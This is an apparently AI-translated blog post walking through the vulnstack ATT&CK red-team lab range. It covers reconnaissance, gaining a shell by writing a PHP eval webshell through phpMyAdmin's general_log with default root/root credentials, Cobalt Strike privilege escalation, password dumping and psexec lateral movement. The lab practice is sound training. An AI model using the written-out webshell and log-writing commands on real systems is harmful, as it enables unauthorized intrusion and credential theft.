banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。
HomeArchives图文

ATT&CK Red Team Assessment Practical Target - 1

#靶场#渗透#网络安全#漏洞复现#内网渗透#提权#报告714
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
This is a simple target field for students to practice penetration testing, focusing on familiarizing with the penetration process. The environment may have some issues, but overall the process is fine. The setup involves closing 3D graphics acceleration and using VMnet2 and VMnet8. The penetration process includes information gathering, port scanning, directory scanning, and exploiting vulnerabilities in phpmyadmin to gain shell access.

Introduction#

The target environment comes from: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

A simple target environment originally intended for student assessments, but it was not utilized. The lateral domain penetration only used the psexec module from Cobalt Strike, and the main content is to familiarize oneself with some penetration processes.

Many vulnerabilities in the target environment could not be successfully reproduced, and there are some environmental issues, but the overall process is fine.

Environment Setup#

You need to disable accelerated 3D graphics; otherwise, the virtual machine cannot start.

image

The topology diagram is as follows:

image

The network settings are as follows, using VMnet2 and VMnet8:

image

Web server (VM1) - Windows 7 (dual NIC, NAT mode + vmnet2 (host-only))

image

IP: 192.168.111.128 and 192.168.52.143

Start phpstudy

image

DNS points to DC

image

Windows 2008 DC (VM3)

IP: 192.168.52.138

image

Windows 2003 domain member (VM2)

IP: 192.168.52.141

image

View the current domain

image

Penetration Process#

Information Gathering#

Nmap Port Scanning#

image

image

Sword Scanning#

image

Directory Scanning#

image

phpinfo page

image

phpMyAdmin Login#

If the password is: root/root

image

phpMyAdmin Getshell#

Get shell through logs

Check if logging is enabled and the log storage location: SHOW VARIABLES LIKE "general_log%";
image

Enable logging: set global general_log='on';
Check if enabled: SHOW VARIABLES LIKE "general_log%"

image

Set the log file to a malicious file; you need to find the website directory first.

image

Set the log path: set global general_log_file ='C:\\phpStudy\\WWW\\s.php';

Successfully set

image

After preparing the work, start writing the shell. You only need to query through SQL statements.

select "<?php @eval($_POST[cmd]);?>";

image

Access webshell:
http://192.168.111.128/ss.php

image

Ant Sword connection:

image

The website's port 80 is yxcms

image

Log in to the backend, and you can also execute SQL statements.

image

Webshell view IP address

image

Found dual NIC

Cobalt Strike Startup#

Go online to operate on Cobalt Strike.

Server

image

Client

Establish a listener

image

image

Generate payload

image

Upload payload to Ant Sword for execution

image

Run exe, Cobalt Strike goes online.

image

Sleep 0

image

Shell whoami

image

Privilege Escalation#

Use getsystem in Cobalt Strike for one-click privilege escalation to obtain system permissions.

image

Internal Network Information Gathering#

image

Click target to find three machines; if not found, perform a port scan to discover them.

image

Dump hash

image

Obtain plaintext passwords

image

Lateral Movement#

After obtaining the password, lateral movement is performed using psexec. Here, the passwords for the three machines are the same; if they were different, lateral movement via SMB would not be possible.

image

Select psexec64, 64-bit

image

image

Obtain domain controller server.

image

image

image

Using the same method to control the Windows 2003 domain member machine 141.

image

Need to select psexec, 32-bit

image

Check the IP

image

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.